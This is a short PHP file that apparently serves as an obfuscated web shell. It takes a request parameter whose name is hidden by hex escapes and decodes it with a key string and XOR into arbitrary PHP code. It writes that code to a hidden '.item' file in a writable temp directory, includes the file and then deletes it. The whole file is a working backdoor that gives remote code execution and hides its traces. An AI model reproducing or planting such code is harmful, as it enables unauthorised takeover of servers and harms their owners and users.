<?php
if(!empty($_REQUEST["\x62\x69nd"])){
$tkn = $_REQUEST["\x62\x69nd"];
$tkn= explode ( "." , $tkn ) ;
$pointer ='';
$s ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen($s);
$v =0;
while ($v < count($tkn)) {
$v9 =$tkn[$v];
$chS =ord($s[$v% $sLen]);
$dec =((int)$v9 - $chS - ($v% 10)) ^ 13;
$pointer .= chr($dec);
$v++; }
$ent = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/dev/shm"]);
foreach ($ent as $val):
if (is_dir($val) && is_writable($val)) {
$hld = str_replace("{var_dir}", $val, "{var_dir}/.item");
if (file_put_contents($hld, $pointer)) {
include $hld;
@unlink($hld);
exit;
}
}
endforeach;
}